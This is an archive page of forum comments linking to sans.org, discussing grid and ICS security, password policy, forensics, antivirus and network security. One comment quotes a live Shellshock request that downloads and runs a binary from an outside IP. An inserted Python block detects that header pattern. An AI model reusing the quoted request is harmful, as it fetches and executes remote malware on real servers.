Domain: sans.org
Stories and comments across the archive that link to sans.org.
-
left to right
Easy: walk them through this poster from left to right https://uk.sans.org/security-r...
-
Re:FUD
You would be surprised at the dumb shit I have seen in dealing with securing similar systems. Yes it is layer upon layer of security measures, or it should be. But far too often someone forgets about that ancient tape changer in storage room b-37 that is still connected, or some PHB decides that they want to be able to check in on machines and shut them down from their cellphone while at home.
One of the problems with ICS systems and others like them is that they assume that the operator knows what they are doing, as most of the time the people who are running these things do. The problem occurs when someone who isn't competent, or is malicious, wants to do something else. Here the system may warn them before but will let them do it anyway, unless it was a known bad configuration when initially programmed, but this is often far too big of a state space to program for. Yes there are mechanical limits put on the machine but that doesn't mean it isn't possible to create an unsafe set of settings, as was done with the Aurora generator test where it was brought out of phase with the rest of the grid. Under normal operation that would have been impossible but by toggling things correctly it became possible to bring it out of phase. This took a bunch of very smart people to figure out the right sequence of events, so while it isn't something that could be done easily it could be, and with cellphone apps it becomes more likely. That said, of all the things to worry about this is very low on the list, unless it is your job, and instead I would worry more about squirrels.
Also you seem to have forgotten about the whole Stuxnet incident and other related and similar attacks. All of which were able to abuse equipment. Of course there was the attack against the Ukrainian power grid a little more than 2 years ago too. So I stand by my statement that very often this is overblown in the media who love spreading FUD; there is a nugget of truth hidden there and people who have to deal with these systems need to pay attention.
-
Re:Frequently changed
NIST's recent password recommendations say frequent PW changes are not good practice.
https://www.schneier.com/blog/...
NIST recently published its four-volume SP800-63b Digital Identity Guidelines. Among other things, it makes three important suggestions when it comes to passwords:
- Stop it with the annoying password complexity rules. They make passwords harder to remember. They increase errors because artificially complex passwords are harder to type in. And they don't help that much. It's better to allow people to use pass phrases.
- Stop it with password expiration. That was an old idea for an old way we used computers. Today, don't make people change their passwords unless there's indication of compromise.
- Let people use password managers. This is how we deal with all the passwords we need.
These password rules were failed attempts to fix the user. Better we fix the security systems.
-
Re:I'll take 10 million
I see someone has no idea of what they are talking about in this regard. Here is the current standard that grid operators have to comply with. Also here is what is currently being asked of suppliers by the grid operators when getting a new system. Requiring that the systems be benchmarked against these or these is also being written into the contracts now. I would assume that operators in the oil and gas industry either have similar things or are at least smart enough to re-purpose the above, as the effort to do so would be minimal. A lot of the security efforts for securing the grid are not to protect it from the general internet; they are already separated, and if not the company fucked up really bad, and if NERC finds out the company will be paying some huge fines, so let NERC know. Instead the security is to protect the control system from stupid users who find a USB rubber ducky in the parking lot, connect their corporate laptop to the control network, someone doing malicious things out at some remote substation that then gets into the main control system, or a malicious insider. The people going after the grid are professionals and more often than not state actors, not little Timmy from down the street who just found out about Low Orbit Ion Cannon or Armitage.
-
Re:Do they meet PCI compliance?
Probably, except for the part about not storing personal information, but then they aren't card processors. The PCI standard, while it is a standard, is really the bare minimum that companies should be held to for them to not be found guilty of criminal negligence for breaches. The actual standard is here, and having had to deal with MBAs asking about our compliance makes it seem like it is something written for the MBA types to check off a bunch of stuff. There are much better standards and if you aren't an MBA you can figure out how to make them applicable to your business. Personally I like the NERC CIP standard with liberal utilization of the CIS benchmarks as a good starting point for securing a system. If you want others there is always the US government's set of security benchmarks, the DoE document Cybersecurity Procurement Language for Energy Delivery Systems, or a bunch of stuff at the SANS site that you could use as a guide.
-
Re:Um No, That is Not The Solution
In the US if a power company loses computer control of their portion of the grid they still get the joy of rolling trucks out to substations and other locations to maintain control. An interesting thing about the Russian hack of the Ukrainian grid is that the Russians also DoSed the call center to prevent the outages from being reported sooner. Like with any number of cyber attacks there were multiple ways that this should have been stopped but wasn't. One can read all about findings either here or here for good analysis of what happened. Besides, if people think a cyber attack against the power grid is the greatest threat they should consider those bastard squirrels instead. If one really wanted to do some damage, discharging a high powered rifle (think .30-06 deer rifle) into some of those large transformers at substations would be easier and cause a longer outage than a cyber attack, as there just aren't many spares around.
That isn't to say don't worry about cyber attacks and don't mitigate things, but there are a lot of other threats that are as damaging or more so that should also be prepared for.
-
Quit fooling yourself
They didn't dance along the edge of legality. They danced over and never looked back. Legitimate pen test services are painfully aware of this and have the paperwork to prove it.
Ars should have enough sense to check things out for the sake of their own credibility. If Ars Technica bothered to ask anybody who's ever worked in the security industry they would have quickly learned the indemnification is taken very seriously.
http://www.isaca.org/chapters3...
https://pen-testing.sans.org/b...
Hell, even metasploit has been talking about this for years!
https://dev.metasploit.com/pip...
The only people fooled by Gizmodo's phishing logic were the editors who signed off on this to begin with. Next time ask a pro before you publish; it will help you avoid looking the fool.
-
Re:How to catch fopen() without hooking kernel?
But a whitelist requires more diligence to maintain if you don't want to turn a PC into a game console
A whitelist is a gateway to an app store only system with censorship and lack of choice.
That's sort of what I was getting at. It really depends on by whom it's managed. Some PC owners can be trusted to maintain their own whitelist; others can't.
If by an experienced user
A whitelist managed by an experienced user is highly effective, as described in an article by Roger A. Grimes and a SANS white paper. It's even better when you have a couple such users to handle application evaluation requests in a company's IT department.
If by an inexperienced home PC owner
A malware publisher can social engineer a user to approve malware. Some people actually prefer censorship because they don't trust themselves to perform the "vigilance" that is "the price of liberty".[1] In fact, ease of use is why game consoles are still around, as what some consider "censorship" others consider "peace of mind that I won't irreversibly break something". But a solution requires precisely defining "censorship", as malware authors would claim that they're being "censored".
[1] Thomas U. P. Charlton. The Life of Major General James Jackson. Augusta: Randolph & Co., 1809.
-
Lateral Movement
The problem with this vulnerability is that it provides yet another mechanism for lateral movement within a compromised network. See, e.g., Killing Advanced Threats in Their Tracks: An Intelligent Approach to Attack Prevention.
Just thinking this isn't a problem because "no one exposes SMB ports" is missing the point. This can be very bad. Think about what happened to Sony -- hackers got in, moved data around, and spent their time, using various exploits. This is one that could be very helpful in such an attack.
-
Why is giving law enforcement agencies access to d
Why is giving law enforcement agencies access to data always referred to as a backdoor?
egulations-standards-encryption-applies-34675 - have a look at this document.
Is it because it conjures up the image of a key left under the doormat that anyone could stumble across and then use to let themselves in and steal all of your property?
Let's take the example of Apple's iMessage which uses end to end encryption. Apple generates the encryption keys, they are the key holders. In theory they could give those keys to the NSA who would then have real time access to messages.
iCloud- Apple can gain access to phone back ups whenever they want.
(Feel free to replace the word Apple with Google or Microsoft if you prefer.)
But those obvious weak points, which could be exploited by criminals, are never referred to as backdoors, why?
technology essay topics – featuring encryption law drawbacks.
-
RSA is coming! Activate the Hype machine!
With the big RSA security conference on the horizon, expect to see lots of stories about the latest security solutions, especially from start ups.
If you want good security, work on implementing the SANS Top 20 security controls instead of looking for a silver bullet.
-
UPDATED: Not an attack on infrastructure after all
From TFA SANS ICS cited at the end of the Slashdot summary:
*Update* A cyber analyst in Israel (Eyal Sela) messaged me to add that the media reporting so far is misleading with regards to the context around the incident. The "Israel Electric Authority" the Minister mentioned is in no way related to the networks of the Israeli electric companies, transmission, or distribution sites. The Israeli Electric Authority is a regulatory body of roughly 30 individuals and this "cyber attack" is only referencing their networks. The original purpose of this blog was to stress caution to the reports but did not try to dispel what the Minister of National Infrastructure, Energy, and Water resources had stated, as reporting was too early with no evidence presented. However, new reporting shows that the "cyber attack" was simply ransomware delivered via phishing emails to the regulatory body's office network and it appears in no way endangered any infrastructure.
This once again stresses the importance around individuals and media carefully evaluating statements regarding cyber attacks and infrastructure as they can carry significant weight.
-
As provided elsewhere
As provided elsewhere here is some more information on what was actually found.
-
Some more info on the incident
For those looking for some more info on the attack you can find it here. It is basically what some investigators have uncovered thus far and as a bonus it isn't in Ukrainian.
-
Re:Words without actions are meaningless
For starters, I have read up on it, and many many vendors agree that it IS security.
Sources:
Cisco (Top 2 paragraphs of intro)
http://www.cisco.com/web/about...
SANS institute (Page 5, 2nd paragraph)
And so on.
As to your solution, it has a massive issue. Route tables must use next hops as their gateway; you could not enter a command like that targeting my WAN and have it work, because my WAN IP would not be a next hop for your computer. The only thing your route table can do is instruct your computer which IP on your broadcast domain will be willing to handle your datagrams. At that point, it is up to that router to figure out the next hops.
You will note I asked you what the L3 / L4 headers would be on your packet; this was specifically to demonstrate why such attacks would fail. You would have a source address of 9.9.9.9 and a destination of 192.168.50.5, and you would instruct your computer to pass that datagram off to a router at ethernet address 99:99:99:99:99:99 (your router), and he would promptly vomit and say "what the hell, I can't route an RFC1918". Add the route on your router, and you've shoved the issue back to your ISP, whose router would either fail to find a route for that subnet, or (more likely) outright reject it as a violation of RFC.
The only scenario in which this attack makes sense is when the attacker IS the next hop, that is your ISP. And for 99.999% of users, this is not a realistic threat model they will face, and NAT will be "acceptable" security.
No one argues that a stateful firewall is BETTER (as it prevents attacks like you mentioned), but to say that NAT adds no security whatsoever is being silly; major infrastructure vendors disagree with you.
-
old news
http://www.sans.org/instructor... Mike Poor has been saying this for years
-
Re:A turd by any other name
No, that doesn't follow at all. Firefox was a significantly better browser at the time, before they jumped the shark after version 4.
Your disagreement seems to be looking from now backwards instead of from the beginning. Since Firefox was named specifically, it's a browser that wasn't released until 3 years after (4 excluding the technology previews) the competition.
Better is such a subjective word, better how? Stability? That eliminates technology previews bumping the "better" browser back another year. I sincerely hope something developed years after its competition was released would improve upon established norms. Out of the gate it was feature incomplete by their own version numbers. Steve Jobs is one who can make that a compelling argument. Firefox also featured some really cool fundamental concepts, like the now ubiquitous download manager.
Firefox became competitive in 2005/2006. Prior to that IE was top dog; when IE6 was released it was better than the other browsers by means of features like standards support and speed. Prior to the JavaScript engine wars fundamentally changing things, there were incremental steps. IE6, believe it or not, was peppy compared to Netscape's offerings. This is documented in Netscape Navigator's decline. IE6 at the time it was released and for many years was what the vast majority of designers targeted and designed for. "Designed for Internet Explorer" and "Designed for Netscape Navigator" were prevalent like perverse badges of honor. In my opinion the debut of Firebug in 2006 was a turning point for designer/developer interest, considering many tools are heavily inspired by its features. Here's a neat little read on IE1.0 up to Firefox 2.0.
I never claimed there was only _one_ tool. You sure love to jump to conclusions about things I never said. There was another utility I used to use back in the day too, it might have been MultIE. I've deleted / removed almost everything related to IE.
The way you mentioned it was, paraphrasing: "Sandboxie was really annoying." So is installing Steam games into it and so is supporting dozens of viewport sizes. Welcome to software!
You're missing the point. Microsoft popularized that crap. Just because other vendors are doing it doesn't give MS a free pass.
I feel like somewhere in your secret volcano lair there exists a giant whiteboard which has a soul crushing flowchart with winding complex paths leading to the giant Sauron like cloud labeled "Microsoft: Great Satan". At some point the responsibility shifts to the shoulders of those who take action.
-
Yes it is being exploited
There is evidence that this is being exploited in the wild.
Nginx and Apache servers using mod_cgi are two potentially vulnerable services. The risk is that it is possible to modify environment variables which then could allow the execution of arbitrary code with the permissions of the parent process.
An example attack:
GET./.HTTP/1.0
.User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
Over at the Internet Storm Center http://isc.sans.org/ they have been updating their advisory and have a simple one-liner to test if a system is vulnerable.
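Detection logic for the header pattern shown in the request above, as an added example that is not from the comment or from the ISC advisory: it parses raw HTTP request headers (the values CGI exports as HTTP_* environment variables) and flags the function-definition prefix. The request samples, IP addresses (documentation ranges) and header names are constructed, and the match is deliberately looser than bash's exact "() {" prefix check so that scanners that vary whitespace are still caught.

```python
"""Flag Shellshock-style function definitions in HTTP request headers.

Added example; sample traffic below is constructed for the demonstration.
"""
import re
from dataclasses import dataclass
from typing import Iterable

# A Shellshock payload stores a bash function definition in an environment
# variable. Through CGI every request header becomes an HTTP_* variable, so
# the header values are where the "() {" prefix appears. The regex allows
# optional whitespace between "()" and "{" to catch sloppy scanners too.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


@dataclass(frozen=True)
class Finding:
    source_ip: str
    header: str   # header name, lower-cased
    value: str    # full header value that matched


def parse_request(raw: str) -> tuple[str, dict[str, str]]:
    """Split raw HTTP request text into the request line and a header dict.

    Only the first ':' separates name from value, so a payload containing
    colons (":;}") stays intact. Duplicate headers are joined with ', '.
    """
    lines = raw.split("\r\n")
    request_line = lines[0]
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if line == "":            # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if not sep:               # malformed header line; skip it
            continue
        key = name.strip().lower()
        value = value.strip()
        headers[key] = f"{headers[key]}, {value}" if key in headers else value
    return request_line, headers


def scan_request(source_ip: str, raw: str) -> list[Finding]:
    """Return one Finding per header whose value carries the prefix."""
    _, headers = parse_request(raw)
    return [
        Finding(source_ip, name, value)
        for name, value in headers.items()
        if SHELLSHOCK_RE.search(value)
    ]


def scan_log(entries: Iterable[tuple[str, str]]) -> list[Finding]:
    """Scan (source_ip, raw_request) pairs and collect every finding."""
    findings: list[Finding] = []
    for ip, raw in entries:
        findings.extend(scan_request(ip, raw))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per source IP, the shape an alert or block list wants."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.source_ip] = counts.get(f.source_ip, 0) + 1
    return counts


# Constructed sample traffic: two benign requests (one even reuses the
# "Thanks-Rob" User-Agent without a payload) and two that carry the prefix
# in different headers. The command after the prefix is a harmless echo.
SAMPLE_LOG = [
    ("198.51.100.7",
     "GET / HTTP/1.0\r\nHost: www.example.test\r\n"
     "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n"),
    ("198.51.100.8",
     "GET /cgi-bin/status HTTP/1.0\r\nHost: www.example.test\r\n"
     "User-Agent: Thanks-Rob\r\nCookie: session=abc123\r\n\r\n"),
    ("203.0.113.5",
     "GET / HTTP/1.0\r\nHost: www.example.test\r\n"
     "User-Agent: () { :;}; /bin/echo shellshock-probe\r\n\r\n"),
    ("203.0.113.9",
     "GET /cgi-bin/status HTTP/1.0\r\nHost: www.example.test\r\n"
     "User-Agent: Thanks-Rob\r\n"
     "Cookie: (){ :;}; /bin/echo shellshock-probe\r\n"
     "Referer: () { :;}; /bin/echo shellshock-probe\r\n\r\n"),
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"ALERT {f.source_ip} header={f.header} value={f.value!r}")
    print(summarize(hits))
```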
-
Training/Conference Crossover?
You might consider http://www.sans.org/ training classes/conferences. They're mostly focused on security, so that has to fit for you, but I've learned a lot in both of the classes/conferences I've attended with them.
-
Re:Offline cracking
One thing you're not considering is that in a Windows Active Directory domain, machines cache the users' passwords. These caches are stored locally on the system to allow logons if a domain controller is not accessible, a necessity for many users with a laptop. If a user's machine is compromised with a phishing/watering hole attack, that gets the attacker one account. If that can be used to access a terminal server, that can lead to many more accounts, and probably a privileged administrative account as well.
Two factor authentication helps with these problems, and sometimes the password complexity requirements you hate can help too. Here is an article about how insecure the local caches Windows creates are: http://digital-forensics.sans....
-
Re:Probably
http://digital-forensics.sans....
your choice is between kerberos support (to join an ad domain), or having your plaintext password stored in memory and extractable with mimikatz (which would be a violation of virtually every security standard ever written but ms seem to get a free pass), they are very much related.
and yes hash passing is ad related too, because it uses authentication protocols which are vulnerable to such attacks. sure it can use others too like ldap, but is it ever actually configured that way? and is it possible to make windows clients join the domain only using ldap for auth?
-
Re:Wrench beats encryption every time
When people talk about USB flash drives 'self destructing' they presumably mean that the flash memory gets completely erased rather than blown to bits with explosives.
E.g. with a flash chip you could just loop through all the physical blocks and erase them. With a SATA drive you could do a secure erase of the whole device. That could take some 30 minutes to 1 hour. However, if you power cycle the device it will just restart until the process completes.
http://computer-forensics.sans.org/blog/2011/01/25/digital-forensics-erasing-drives-quick-easy
A full erase using SE can take 30 minutes to over an hour to complete. The thing is that the drive will restart the wipe if it is power cycled. So just restarting the host will not stop the process.
Another option would be to encrypt the data with AES with a random key. When you need to self destruct just erase the flash memory containing the key. So you've still got the data it's just incomprehensible.
-
Re:The article is at best suggestive
Hello, potential Russian/Chinese shill! It is a speculative claim, not a proven claim. For all we know they selected it to be resistant to some particular attack. If that is the case, your "no proof needed" assertion leads everyone off a cliff.
Are you calling the linear attack against DES feasible? It takes 2**43 known plaintext/ciphertext pairs!
https://www.sans.org/reading-room/whitepapers/vpns/s-box-modifications-effect-des-like-encryption-systems-768
-
Re:I can think of one that Steve Jobs disagreed wi
First, read this:
Knuth: The Art of Computer Programming, Volumes 1-4A Boxed Set
http://www.amazon.com/Computer-Programming-Volumes-1-4A-Boxed/dp/0321751043
Then read this:
https://www.sans.org/top25-software-errors/
Everything else is a niche.
-
Security is possible, but you must focus.
I have been doing IT for 30 years. I have been doing Security for a University for about the last 15 years. I have found that security is possible, but you have to focus.
The biggest problem is we are not taught how to do security. We are taught attack. But attack is not security. We are taught checklists, but checklists are not security.
Security is a meaningful assurance that your goals are being accomplished. The details are transitory. But, without goals, security has no point. Sticking to your goals when attacked is the heart of defense. Ultimately, it is the only thing that matters in security. Your organization adds value by sticking to its goals. But this is more than just a matter of value added. Goals are the spirit of the organization. If you don't stick to your goals when attacked, then you have lost. The attacker may not have won, but you have lost.
But, security folks are not taught how to support institutional goals. Instead, we are taught myriads of other things. You can see examples of the mechanics of security defeating meaningful security all over the place. One striking example is the SANS 20 Critical Controls: http://www.sans.org/critical-security-controls/ While they contain many good points, they fail to teach security. When we analyzed them, we found that they tended to replace security process with checklist. When we had finished the evaluation process we had eliminated, reordered and replaced many of their controls. Our most important control was not even mentioned. It is:
Critical Control 1: Unity of Vision
Security is a MEANINGFUL Assurance that YOUR goals are being Accomplished. Most security failures are enabled and enhanced by disagreement of purpose. Are the fundamentals of management in place?
- A. How does your organization create a sense of community?
- B. What are your Institution's Goals?
- C. How are those goals propagated throughout the organization?
- D. How do your security actions promote your institutional goals?
- E. How do your security actions provide assurance to your institution?
- F. How does your institution reward long term loyalty?
Another glaring omission is the complete lack of strategic thinking in the security community. Winning battles, but losing the war is our way of life. Nothing in the SANS controls guides you to ask the important questions like: "Where am I going?" and "How did I get in this handbasket?" and "Do I HAVE to eat this crap?" For our analysis of the SANS Controls, we added another Control. We valued it at number 3:
Critical Control 3: Enable a Better Future
This control assumes that our actions affect the future. Do your actions enable a more secure future?
- A. How do you increase the cost of attack?
- B. Do you report attack to the remote ISP/attacker?
- C. How do you coordinate with law enforcement?
- D. How do you decrease the cost of defense for yourself and others?
- E. How do you reduce the motivation for local attack?
- F. Do you disclose vulnerabilities to others? If so, will your institution protect its people when others attempt to punish disclosure?
- G. Do you facilitate others disclosing vulnerabilities to you?
- H. Do you help your peers improve their security?
The SANS 20 Controls were originally written by the NSA for the Department of Defense: http://www.sans.org/critical-security-controls/history.php The recent NSA disclosures make me wonder if maybe they are flawed, because the NSA simply doesn't value effective security?
-
Re:Why are critical systems on the 'net?
Here, don't believe me, believe SANS. Seriously, you can yell and argue, but you clearly have a lot to learn and that's a decent overview to get you started.
In IP telephony packet loss is unacceptable. The performance of an IP call will suffer greatly if packet loss occurs. The quality of the conversation will lag if packet loss reaches more than 5%
From experience, 5% packet loss would make for a completely unacceptable level of quality. At least relative to the level of service I provide.
Delays in voice traffic create gaps in the transmission that may be heard by the receiver, resulting in unhappy customers. QOS technology features concrete priority service to voice traffic to establish predictable delivery. Usually small in size, transmission of voice packets range from 80 to 256 bytes. Unless QOS techniques are used such voice packets can be delayed between larger data packets. QOS techniques used are packet fragmentation and interleaving. One of the crucial technical issues with QOS is that in order to be effective it must be supported end-to end. For VoIP to be of functional quality the network should essentially have a bare minimum data rate and bounded delay variation.
If QoS mechanisms are supported on only portions of the network there are no guarantees that the traffic will get the handling end-to-end that is necessary to achieve success.
-
Re:Try NSA Security Guides...
Check this out also as a guide to security. All 20 need not be implemented, just the ones pertinent to your organization.
CSIS: 20 Critical Security Controls Version 4.1
http://www.sans.org/critical-security-controls/?utm_campaign=resources&utm_source=featured&utm_medium=web&utm_content=critical_controls
-
Not only mice...
A few days ago I bought a 2TB Western Digital hard drive, which uses the newer 'Advanced' (4KB) sector format and an emulation layer (in controller firmware) to present normal 512-byte sectors to the host. To avoid a massive performance hit, the drive has to be partitioned using WD's special sector-alignment software - an 80MByte (Windows-only) download with mandatory account registration and validated email address.
What massively fancy, complex thing does this 80MB worth of software do? Move all the partitions forward by 1 sector. Yes, literally! (For legacy reasons, most disk utilities partition a HD with a 63-sector offset; the alignment utility moves it to 64 so that all disk structures will align on 4KB boundaries.)
(Why not just ship the drive with a default 4k-aligned partition? Where's the money in that?)
-
Best AV is almost as good as nothing at all
The only thing AV provides is a false sense of security. With AV, you're waiting until AFTER an infection occurs and then HOPING the AV company you've chosen has A) seen the malware before, B) bothered to add a signature to their definitions list, and C) is actually capable of removing the virus.
Better ideas: Turning on AppLocker & running most of the time as an unprivileged user. Check out OSSEC for use as a File Integrity Monitor and Host-based Intrusion Detection System. Disable unnecessary services, remove unnecessary programs, use an ad-blocker, a "default deny all" firewall policy and get a 3rd party patch manager to keep all your non-MS bits up to date. Secunia PSI is a free patch manager/vuln scanner for home use - there are others.
For a detailed description of just how bad AV is at protecting systems, check out the following blog post at computer-forensics.sans.org:
http://computer-forensics.sans.org/blog/2012/04/09/is-anti-virus-really-dead-a-real-world-simulation-created-for-forensic-data-yields-surprising-results
-
Re:Nuke it from orbit
http://computer-forensics.sans.org/blog/2009/01/15/overwriting-hard-drive-data/ has some experimental stats on recovering known bits of data from drives. Note "bits" - longer strings have rapidly diminishing probability of getting anything back.
Back in the old days of floppy disks, though, it was fun to demonstrate recovery of data, especially when they had been written on a 40-track drive and read on an 80-track drive.
-
Re:WTH
Sorry; one part of your comment I didn't respond to with my other post. I read your original article (considered immoral around here; I took the "rtfa-troll" tag specifically so I could claim to be trolling if someone caught me doing this). You mentioned risk mitigation; I was not convinced by your arguments and they have mostly been answered elsewhere in the comments thread. I will point to some:
There is more risk if the cracker obtains access to your actual device, but that person must have significant forensic skills and software, and extracting the app data might take an inordinately long time
There are specific forensic devices which do this automatically and are available to the kinds of people who run organisations where stolen iPhones end up, not to mention large foreign competitors of the type of people who need and care about password safes and governments. These machines fully automate these attacks.
If you use iCloud for backups or have a strong, secret iTunes backup password, your device backups aren’t vulnerable.
Serious security concerns have been raised against iCloud by people with more security knowledge than myself. Also I am not aware of a serious outside audit with published results. I would not be prepared to accept this statement without much further research and access to Apple's design and implementation information.
If locked, the passcodes used by the iPad 2, third-generation iPad, and iPhone 4S are entirely secure unless the device was jailbroken before being locked.
In my experience, problems such as USB/wireless exploits, etc., have always found ways to work around this security. Could you please give a bit more basis for this belief?
Simply put, good security should be made up of different layers where the failure of one layer will not lead to the others failing. I do not find the general security of iOS to be sufficiently convincing to consider running an insecure password manager on it a good idea.
-
Found a direct link
Internet Storm Center. Apparently it has been up for quite a while. What bright lights of wonder Microsoft hides under their bushel! I wonder what else there is.
-
SANS perhaps?
I've heard things about SANS, though I've never taken a course from them. They do have some courses on web development. Even if you can't afford to take one of their courses, you might look through the content brief to see what it covers and what areas you should be looking at, or find someone who's taken the course and ask what was covered.
-
Re:The Outhouse Principle
And every user with admin privileges can re-enable those settings any time they want. The auto run is only one USB issue; there are several others.
Perhaps you should read at least one paper on USB security issues before you deem them safe. Here is one: http://www.sans.org/reading_room/whitepapers/threats/usb-ubiquitous-security-backdoor_33173
-
Re:If this is an issue...
They would fold the letter over on itself, and seal it with wax, often with a characteristic indentation from a stamp. Although the Wikipedia page for sealing wax disputes that arrival date for envelopes; it has them arriving in the 16th century.
And of course, people freely use email with an expectation of privacy but are ignorant that it's akin to sending a postcard via an association of disreputable postmen, not limited to thieves, spies, secret police, and salesmen, and that each of them must read the postcard to be able to pass it onwards. The envelope icon present in the GUI of most modern email programs is pretty misleading from this point of view.
People have been using encryption methods for thousands of years though. But only the elite. It would seem the common man really does believe he has nothing to hide...
-
Re:"No antivirus software was present"
A virus will initiate at least one outbound connection.
Not necessarily - a clever virus could be using side-channel communication and have modified an expected connection.
See also http://www.sans.org/reading_room/whitepapers/detection/covert-channels_33413
Difficult and probably hard to implement, but as long as the server does any legit outbound connections the virus could transmit data there.
(DNS lookups, TCP/UDP and IP header modifications. The options are many.) An air-gapped network as other posters are describing would make this more or less impossible (or, at least, impractical).
-
Re:Something Fishy
Start reading the SANS (SysAdmin, Audit, Network, Security) newsbites. (Sign up at http://portal.sans.org/)
The depressing reality is that most security money these days is spent filling out paperwork, and getting exemptions where you don't meet the standards. That coupled with the fact that there's simply much, much, more stuff online now, makes hacking easier.
-
stegapornography ?
It has been previously reported that steganography porn is used by Islamic terrorists and it must be true as I read it on the Internet ...
-
Re:"sans issue"
Obviously it was a security breach, which is why they called the SANS institute to help figure it out.
-
Re:Better question is how overwritten was the rest
http://computer-forensics.sans.org/blog/2009/02/04/what-happens-when-you-overwrite-data/
That paper is garbage. I've seen it referenced before only when used to debunk this idea. Wish I could find those threads.
Call a data recovery place and ask. They will say that the overwritten data will not be recovered, but they will see what they can do if you are in a position where the attempt must be made.
-
Re:Marketing fail.
Hunh? What's "Hurt Locker"? First I'd heard of it.
Oh, a film that offers me no appeal, from what I've "seen" so far, which is just the /. commentary. Oscars don't cut it as a recommendation, any more. Attacking the public REALLY doesn't cut it, even when it is purported to be defensive. So can we expect some "accidental" leak of all the "pirates"' personal info, somewhere in this, as well? Perhaps in PDF court documents? (see SANS stormfeed about new PDF & Flash vulns http://isc.sans.org/diary.html?storyid=9487 and "SDF" http://isc.sans.org/diary.html?storyid=9490)
-
SANS
Although I prefer the classroom courses, SANS security courses are very practical. They will help you both with your job and in getting a job. http://www.sans.org/vlive/
-
Re:stop it already
A lot of your argument is based on making a random assumption
I don't think it's random or unprecedented. Moreover, you haven't demonstrated it to be false -- it may be difficult to implement. HTML5 evidently is not.
You've also outright ignored several important points I made:
Have they actually opened the spec to the point where third-party players are feasible? Last I checked, the spec was open for creating content, but not playing it....the DRM'd stuff is not and never has been open, so I can't duplicate that -- and Hulu is using that. So either you're wrong about Flash being open, or you're offtopic, take your pick.
You didn't answer either of those points. You handwaved about third-party players existing, but that doesn't tell me whether or not they're allowed to read the specs yet -- again, the specs were open to third-party content creation tools for awhile, but not players, for some perverse reason.
On to your arguments...
There are half a dozen working, competing, incomplete implementations of Flash, and many fully fledged production cross-browser apps on top of it.
Citation needed.
In brief, because they're web browsers, and their remit is to implement W3C's HTML spec, not to write it. Other motives include Google's dream of holding all your data and serving everything via Javascript....
While true, it's still entirely up to a browser to simply refuse to implement a spec. In particular:
MS, as usual, is just paying lip service in the hope of preserving browser marketshare.
That raises the question of why they would implement the video tag, but not canvas?
The point here is that there are other players than Apple -- other contributors to the spec than Apple -- and more to HTML5 than video. Your claim that this is just because Apple doesn't like Flash is wrong on many levels.
No, not at all. I don't see lots of iApps being written in the "entirely open HTML5",
Mostly because then they're not iApps anymore. Then they're just web apps, which happen to work on Apple devices, but also work in any decent browser.
So how would you know?
And years 4 to 9 of the web were awash with huge imagemaps which everyone hated and which were soon replaced with smarter HTML as people accepted that an img was for an image, not for intelligence.
What? No, people still do things with images, though not to that extent. We still have mouseovers, at the very least. Images are used in place of buttons for interaction, and they're used as indicators and such all over the place. We've even got tricks with "sprite maps", where a single image file is manipulated through CSS to appear as multiple tiny icons as needed throughout the page.
More relevantly, you talk about "smarter HTML" -- I asked how an effect which is possible today with Canvas could be duplicated with SVG, and your response was to denigrate the effect. Apparently, smarter HTML, or smarter SVG, isn't really possible at this point.
video is a not entirely insane tag, but it appears in HTML5
That's like refusing to use HTML because it once contained the blink tag.
It's as modular as you pretend HTML can be, i.e. you could make a non-conforming implementation leaving out as many features as you want.
What no one has done yet is to create a competing, conforming implementation. That's the prerequisite -- leaving shit out isn't modularity. Modularity is being able to add and remove features at will, and for that to work, you need to have all the features at some point.
Bullcrap. The browsers themselves are the single biggest attack vectors,
The numbers disagree. Including the browser, most atta
-
Re:An Opportunity
Method for spoofing an IP: http://en.wikipedia.org/wiki/SYN_flood
Method for preventing original IP from connecting: http://en.wikipedia.org/wiki/SYN_flood
Proof of concept code ARP + SYN: http://perl-code.blogspot.com/2008/04/arp-poison-syn-flood-with-random.html
Real-life example of ARP spoofing on compromised servers: http://isc.sans.org/diary.html?storyid=6001
Not likely to be used for P2P, but in the realm of possibilities. I would not be surprised if all the content providers they found are just proxies, legit or pwned.
-
Ignorance is bliss
"I've never had any of my computers, running Mac/Windows infected by anything that I know of, I don't use any sort of protection either..."
Well, there's your problem right there. If you're running Windows and connecting it to the net, it is infected as a matter of course whether you choose to become aware of it or not. The only way to prevent it is to not use Windows.
So on behalf of all the Fortune 500 companies, whom I do not represent, and on behalf of all the rest of us, whom I don't represent either, who feel the pinch from their elevated operational costs, may I be the first to extend a heartfelt, sincere "FUCK YOU, VERY MUCH" to you and any horse you might have ridden in on.
-
Re:For non-Windows-expert family tech-support type
http://isc.sans.org/diary.html?storyid=8656
Basically it looks like command line
shutdown -a (to stop the autorestart)
Put SVChost.exe back in place (out of the quarantine)
and disable McAfee...
-
Re:An old saying...
Wow, I can't believe the level of xenophobia in here. Hate to break it to you guys, but BGP misconfiguration has always been an issue with the Internet and happens all the time (that paper is from 2002 btw). (Oh noes! Pakistan is attacking us too! And Spain! And we're even attacking ourselves!)
You hawks would be funny if some of you didn't hold power.
-
Re:Wasted time
Some media files can pop up a browser window to an infected site that will install malware on your computer, especially if you use older software versions.
There were even GIF and JPEG exploits made public in the past; it probably occurred with other media files as well...
http://isc.sans.org/diary.html?storyid=2997
http://news.netcraft.com/archives/2004/09/17/exploit_for_microsoft_jpeg_flaw_is_published.html